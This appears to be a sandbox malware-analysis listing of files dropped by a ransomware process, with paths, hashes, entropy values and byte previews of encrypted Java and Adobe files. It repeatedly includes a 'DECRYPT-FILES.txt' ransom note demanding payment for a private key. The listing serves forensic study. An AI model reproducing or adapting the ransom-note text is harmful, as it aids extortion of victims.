Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\.jre\lib\images\cursors\cursors.properties Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	2904
Entropy (8bit):	7.88815467070042
Encrypted:	false
MD5:	96083247818ACFDD4B13DE8EFA16B2A3
SHA1:	B93DA0DC7E0FDEBB5847C6F11EA9E9AB394733E3
SHA-256:	6326659912F07B19BCC13A0995CBA6CF88F2B84E1EBE37B262501289D2DECDB8
SHA-512:	41D4408364F1B3134B48BCCAD556FF57000C76F4A6933F56C366473572F14CB22902E97771378BE1E266E5014EB559E42670669BBEAA2E0BD5E312C5B1F5DFCA
Malicious:	false
Preview:	..m..t..c=..u....jY.M..I.:.P....gBn......=..2....W.g.........iq....}.....p.W.]l........b.v-..m........f.~$RL..i....C....f=....!$(_KT.D..;saf.......x...[..7[l.0.......:}2W.....Wf....8..9..b.'..q..P.M...r3.'..cq.....r....3Z..>A.Uj....=.'L.Q9.F.....f.af...u..V.X._.....~.....j'..ac...H(..`.\|.<.R.N".1...n.$..M`....."....cYf&"f......5B.....ol...rr...3........w>.o<a.).4.U.![..u`Q1........\|8...d...t?.j..P,.7a.v\V.~..&..lG.Nw7F>....'@............;..\..x.a..x..z\|...../....g.=q.K.ms.1_.5.a..M.xxk.Y.....f.af6...v...M.2{...;..r.i..F.......X....0f..TXN......@B.\.!.....+.y....9..>......N.GJ../.ty..K....MVHD.....DQ#g..T.E.H.......'.?..P$.xQ"j.dyvQ-......D.%..z.5j.3>6......uC.....\..................G`...98".S....-....k...sc...sS6=u...f.....QV9..v..G.D......f.af....&..[...Fh.z.8....?Z.\DnNEO8 ....,..X..k.Nf..<..x.*O0..\|2PN..f.I...('.(.9.k.eCg`s..X........?.!.=..L-`.....q..y.$. .l{s..3z.Bc........7...._.....4A!................3.<.E..L...E...{.%..#..cv.'Dg;

C:\Users\user\AppData\Roaming\.jre\lib\jfr\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\.jre\lib\jfr\default.jfc Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	1848
Entropy (8bit):	7.885946951292536
Encrypted:	false
MD5:	223A4B582E045A0AE07D66D6FD203D0A
SHA1:	F47FE3BCF323EAB7389CF42CF70A23C5EAAF2771
SHA-256:	DEEF11CF17EB2F85AD3EC10C59CCE9210BAE1EB04A78317382E2D9580B7A846E
SHA-512:	9DA326E32931A24FF11256CC7D05ECF499DA1EF9B3A4AA598EF0F38C70D59B3C73FC983AF0D4821506B5FF663C0E0C9D35941FD1F80F1AA24AEEE236DE466710
Malicious:	false
Preview:	.......d...6......Q..t.......EmRb..7..z..O..QH....!........nK.3.-..e..5..yb........}..-.3;./..g.2.Ez..._b.. )j.h...7~...<I.J....\ps.O........".......1d..v...."h.....2nY..~..... 5.U.}..2Ar..WU....M....z.g........'...6.........P.})u.._.pE.B....f.afT.iI.b.?.G...'......M7.<..L......t.IO.O....=.,........B...F.Z._...Tm.E....T.WE...N5q...y..Q..}N..P.m5e.;.....{x..Y...k.y.y....O.4.G.(Io_."....Owm4.."uh......g..Z.V..J....E2.g].n6..HC..}......L..]..R...........I..Y..+.w.=QA6..\J..L......]..3.....f.af.4CG.k..>..X.'<........2....Eh..a.p.....Dk..........0.C.{..d........e..%b...nX7t..\llqK.yW.2......a..`..\|..L...A...x......p.N.[$..........'.H..6w.5...._m\|..lf......X.....@.XN..hq..%.IZ.......3.[...A.6......6..c.yh..m.K].,......."nE..`..........f.af..sp..1.zs..r.U..N).W...K..7u.0.Hc....{..A.[.K..CT..Z.......Hb..r!.....t3...>(..a#.HFN2..j....B}.(}....m'.5=>.t.......G.(3....3x.......f...L..[}.......0n..l..>..fTB*L%.....E...s..m.....\|.....g.x

C:\Users\user\AppData\Roaming\.jre\lib\management\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\.jre\lib\management\jmxremote.access Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	2904
Entropy (8bit):	7.903341997734239
Encrypted:	false
MD5:	88C4C421FE1024AEB974120671902588
SHA1:	A3D5C2FC27BF562AB36FE9BF88243EE1F8EF0E51
SHA-256:	641CB5D031DB4B5D3858B05AED2DB4959631B801782C71C316BDEF8D317A7316
SHA-512:	532218892F2AE1090263E5BB4AE763F19BC8E5D57007B0847A6571F8C9E438D046FB93180067CC6717B630475466558DCD03230EE53CE711BF8CDF69AEFDAB75
Malicious:	false
Preview:	..B.%.h3..(se..#.O.\|.Wx......cS.!n...m.....;..@.z%.H.5.....X........P.S/...)x...#.^.....0s.J.e..~CL..K.n[..4..z3.."..+=p.......F(3..D........V.f...4..)....0,..e.z......Zh@{.K6O...)1J\|M7W...:......Ti..v..\a8d<.._w..D.2....e.Y. t......^W^.%~.,~....f.afD...x...H..l.aD...~6=.{.w.0".....$...e3..I]:Y..f..^tC....s6]j.!.........~.$.CW.uTw:..qX\...9..e..i.T..{....Y..S..Z.#y.W,..h.'=9.AE.......D./.....m.y d..\....L...B...6.t.@....F6c#..'......?...k~..{.j.2.......R..<.pt.$.....U...M].>..1.hD...U~....f.af..bM...W..R..K5...3.K..O..U.(F...L....q."&.(...2I...Om...j...........I.7..\.U...dD...k"..F.rh..\|I./:.....Sp.)......*$..a.@.0l.6J...]+..P...km.#+A.1.....2l.Ruk....e.xU..A.qJ.y..#..]....F%......7....[........e...+..W._...j&. ?.}....sO^....f.afX..6X......g}).Mu....<.....<....k{...!.........Co.`[vF.A.....2eSy[....w..?.....#..G."5.S#\|.w..V'".<.....k...r......K...{......&.\=.....K..oV..u..~.q.Ss.lf.......m, 4....,/g.......7.s.Sg5;.-....,2..cG.

C:\Users\user\AppData\Roaming\.jre\lib\rt.jar Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	54675574
Entropy (8bit):	7.999997062474458
Encrypted:	true
MD5:	C2A1A6E8CA8F872C4577E20FA05EB357
SHA1:	1648CFEC9620B3E83A5B0EF88D5D2B4CD4D31F0D
SHA-256:	B6D6EEE071BEFD466145E95128CFCC8DDADF35F2DE4CA4A12B187B01684C37C1
SHA-512:	B6F22C2741F84A9F349C349983B8B1E7F234E9A63ECDEAAD58F989A25D61D5209ABE4DE3ED7B810456B0266B399BFF25F9F366B60135D369A8611FF10287EAC2
Malicious:	false
Preview:	....-.....g=.t_....>.......Y.W..g.h.km.....>..z.).O.......;bZ..^+z{.2...T.J..}a..?.......\|......0...E.R.=...@.3...0..... .m.`.5OS.>PQ..K.....E[.Or..x...eEK....#%.+v7.I. ....?^...3..;.[^~I.In..".......=.l/.,............m..H6..Rt ....A.g..s.......O.....m{....4...[)...o..n.a#....b..7.3..E..!........j.hYC.G..uv..K..MZ.....:..(ap....j~#<u.c...T..)Dr.._.k...n_H.E0.j..~N....;..N.c#.g%.!..XKU`......j.a....x.}.^....NX..a......8.'H@.A....!...+...Fw.bb.._.....&.K.@.K..8.....Q...Y+4 ...+..IAT.d..$.)<..8~.L..uh.O........&.....%..:...........N...~d....=...@.B.UNr...C...o.:~Y..5....o.D.....~..k&..2U1....ow.\|....c..q:..ND..`.B...1s....y@\...1I.0Mr+_c..{.."...Q.U..=.7L......#JL..c....E.\|.>2?..;......m.8..>(A.M...p.......j.I..d.^.e4...aB.8Q.;.l...c..Z..>...]...u..L....:..`E<..{......R.8,.\3A.$..#g=...3.k........n....z.,.....Z...c.......A^.p.h..1...f3qZ..<..Vu'...EE.q.D....#.x_.o+.m.7..&.yJ..........g.e........e.t*c.A.ThM.........^.\@..:......i.M&.

C:\Users\user\AppData\Roaming\.jre\lib\security\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\.jre\lib\security\blacklist Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	1584
Entropy (8bit):	7.860916671572631
Encrypted:	false
MD5:	3E91CE27124CC6C6D679BFA475CF1528
SHA1:	70A5389425C868EB5605018234051874517C3D71
SHA-256:	444B9521B4CEC7BB6C7346A68E4F124F99543FC3F613A58F89E9F1C1BC014AF3
SHA-512:	F8316E30895EF226CC9DEEE01C89E330D41398DFD18D8CB7A34D734643B6323741A8DC2D6868BBB97BB534ADB0650EE088F16906C125B07D030406477F176A26
Malicious:	false
Preview:	......dI....o.V.D.C.Z.`...b(9R..s...v..w.....I........m...7..\|...mks.K...RBs..O........^. .........z...........!%3.[q..M..:H.....w.ve.....Ku.....4Ki.C.q..H.8l.=.q... T......0..2I`X.?.K....Wd..)...38.N.1...s....b;.....FtK.....P....{..>.....).W....f.af.....C_R~....I..t.hV.G+8.T4o..X..4...^..Q.( y$Y4...e.'.z.<.d.^....VVa..N.....T,=..b.P.I.j.!bh)..-....."..R].:W7..C.C....[......s$].......k1HV..... .(..ULK.,.1.v...iQ...F+<....3d..x..l%...t...h.....es........o:.....L.\..S.B.4.2e.%h3.R.t......-....f.af.. E.....m....x...D.....k...O...Ea......6qk..[.v`u......T.....j.a.....4..`..Y+y}.,.L...,...I..D.......9T...$rn.z"....4.b.3dGa.BN..7.Q.C.....V..q..;....6.TS..[..f....+%R-B..8........?...?..$.!S/...(...].-gA_%/.#..zv...%.Tb.....e..&..Z.)..1..._J.......f.af...F...<..2...JD...[tM......C..`.U..[.......X..2g..'....w..W..~OFH?.=...0.{X5.....I4.~.HM..\.\.>(M....l.2.......zB...>....aRQ%A.X."..N.\|^=T.c..........kt.b..O....7.UC....R..k....S.,m....j..}.....

C:\Users\user\AppData\Roaming\.jre\lib\security\policy\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	18376
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	17C90D15AE0F70CEB0500DC1677C0638
SHA1:	0F645ECE404416F3152689E94539178C658E583F
SHA-256:	7160B9035F4E47A92C4608C45541FB42D07FAD13BB8F4EC07B466DE7694BC11C
SHA-512:	719BC7E235B7901B2D28485A9D9396BF0F787DF34DD667CD7A84F63F8048EF12EBB5EDF2AD5775320B54C1E2515F131359C049AE2509EE510774DE84F03C4008
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\.jre\lib\security\policy\limited\local_policy.jar Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	528
Entropy (8bit):	7.590168814936887
Encrypted:	false
MD5:	3C352DFA99579FE3D03678E37F752A46
SHA1:	00AB9F0290C6E3C8FE0516D422A248F8C9AA8FFB
SHA-256:	AEBE1036A457E2DE9114B145B78C045344F405919DD39CF064BE1309BC8984E3
SHA-512:	4C3BDEBCC1B26EEC48ED2B5165993568D868283C7C677A25B62C3E069BD35414814394F7F0319708B99FB4B7416E32C5487B886039772444A258CA598F79C30B
Malicious:	false
Preview:	M.T..Z....[..>.(....R. .\|...zW.Y.qP.m....5..+8..I...q.B..ro.pE.M#R../.'m\|..s...D,..9...U.....ud....n.c../'.....>.-.......4.1O.P.....9....uJ.<v....i.......l)4..5...q.#...U..t.......X.@K...-.@x]'.h...o.....]\|ON..7.cL.u%..V..t7`Cn..`-....%.Ic5.....f.af...(..lJ...ah/...L.g...Q.S...A.R..k...W@.._.e.[.....j...u,.;.j.e. ....h...G..H.........Y..].^w.....X..=c.........()..6..!......$4...lB\..W......_..n.U._..j....z\|2...L.....Ff...s...#.jsZ.].....8.a...H{........W.&Qu:...s.1.........w........f.af

C:\Users\user\AppData\Roaming\.jre\lib\security\policy\unlimited\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\.jre\lib\security\policy\unlimited\local_policy.jar Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	2904
Entropy (8bit):	7.898508025795618
Encrypted:	false
MD5:	D5DE37B9163C98D969830A7AEED75F1B
SHA1:	1CEDE733164DB8746FFEEF587F1D43B5757E0032
SHA-256:	449145870A39877295B0D98CA37C7E35C2119654EF1384B95BEA6FD399D8E250
SHA-512:	F3438F20F78AE1A2A261E0AEB9CBE649F7088F2124BC62F1BCE06C9E2B9F9498E10466FE62D54A780EE95556C1507E583E83E416FAD5D0F78AD5C031ABFA1A6C
Malicious:	false
Preview:	.Rnl.-.m....q.....{KR..R...A.f....0.m[X..\|5z..(D.$.....i.8.......h.-..U....Z...c&..`..k.......t.. ..~.....?D/._...@..vX..U.7.G.^....\..,4...a..\...O....X......I.M.t....>x.....;.7.J.m..G.U...~.K7g/8+......?....._d...^.......o3"0..W...A.!........f.af."[.....~..E...-.I..M..@I.X#.../..}....}....6=A-vS.$....$.i.>]........Q..E7.%....L,J..;5....%.)......h.......{.t.u..n......@.Z...\..../u.......p........M./..R.>............h..24....4.>.. .3..l _w lTN.Jx.2....Li.Gfh...g.............b.8[..O....\|..1....f.af..3...U......5.Zd\|`I.k^.s\..........0._..#&..,%.h......Q...MpZ..jy.Ju....^]Q..T@..a..h?.CdER.;"...9:Vk7...5~R.-...xc9..Z....&....X.K.......0J....OG....u..Q.R.[;X...M......C...x3i..q$(...9......G+.=.._.....=.N.Zn\...{.<..N..\|p....+c.)..P.R~,....f.af.^.f.6u.......'..o/..6...zx.f....R&....C...@.L&.........`....j.K..{T...C......]A...YD..].q.p....5e..E). ..........}.l...'.f......m...\A..Z.*..p..N..X.\|.00s.kO...)H:....F.....f..e..G...7...q.=(D:a3

C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\JSCache\GlobData Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	528
Entropy (8bit):	7.587657344302206
Encrypted:	false
MD5:	82402E58F8CBF87313939C3EE531DFFA
SHA1:	3841116F392B3951AC668B2756EA3053C50FF31C
SHA-256:	58C02DE49511D822D23810ACE65074FB77ABD3770586F97DEF95AAD4CBD51A35
SHA-512:	D141B9582152EF565C113452D7F3A1C59D74429401CD8CAA32B740B661F8A4E51D0DF0BF14FB3AA2AFF0339EB628B78F65B99CD253937C307E725FB7D4B6C2CF
Malicious:	false
Preview:	.%.~..Q.C.qm."...S.v..........bq?0..U....'.5G\&..s...n..[E.._..9.A).............N.X.....H..7.#....AnkH_w.L.P......B..NY.....).y.Q.9.".....L....1q.T#.,j......~.....#...\.zvl`\..3n]L..c..O..F.hd.,...VU..Z.....yTV..E+.[%.......@ .....y..%..Zb.;....f.afY..=...<6_..6.p.u'aza.9...........\........%L..O.x..^....}.n=..Nr..@..Q3./.../..>.8....;...A2<.!.$.S......j........HQLZ...1..+c\Y..(.g..H....Xu.<9.Bu...a.X....Y..1..M.o..{2.-...%....&..h.._......]r.$.\5.HP..L.c.c...$Y.J.m.cEX..;N.....o.cDV....g.....f.af

C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	1320
Entropy (8bit):	7.8309168895966454
Encrypted:	false
MD5:	D49F6E00739749EDB96078A2F16B0D35
SHA1:	5E4F564038DB4C287540B51F397080E709BE1BCA
SHA-256:	2E5278293709B8B781DFF86BA2DFFA25617A2F2AA133D2A4BE6F622361C1A65E
SHA-512:	5A8BD5C56B29EF5D9F7E12EE8830B65F682ABDEFD085F3048B78D8E9EE70FA582D10CF2C170AE1E6EDDD0F8D57F5B14B91D2DC1E537A45299EE7EB5388130D7E
Malicious:	false
Preview:	..n.......enG..q.r.....0..R...V......z^..Q.X.E..Qo.....I......>.:A...B.u.g..Z.ULdK...Cr..xi/;vW....+o....7I:I."..^..MT..p..D....7..g@.h.#...y.>...^i&...@..5..h/...:...$..a...lW.......N.{.....D......U..././2..Q..'.H....C/..Sq..f..\{.F.8.g3..q.....f.af.L...C...q.S....?...X.. ..4@..S..&&u.....r......p.t#.e...=...;n..~...n..O.^vRp..).9....F.).&...9.rG/......^..!.....`1...'.4.H.2...l.c1 G...P.......;y..u.N.?....EXe)5l...u.!..5V..}...bu...("vo.,]...@.n...`9..nt]....C....Z.......NM....[.............f.af. la]=:.h......s1.P>.6.]Co."..:.....4.....Mu...:..r,..@.^.G.#...0.T..~)M...&'n.........XFCl...6h`..sH7}l}..Q.O3hf..s....6..i..7XwE 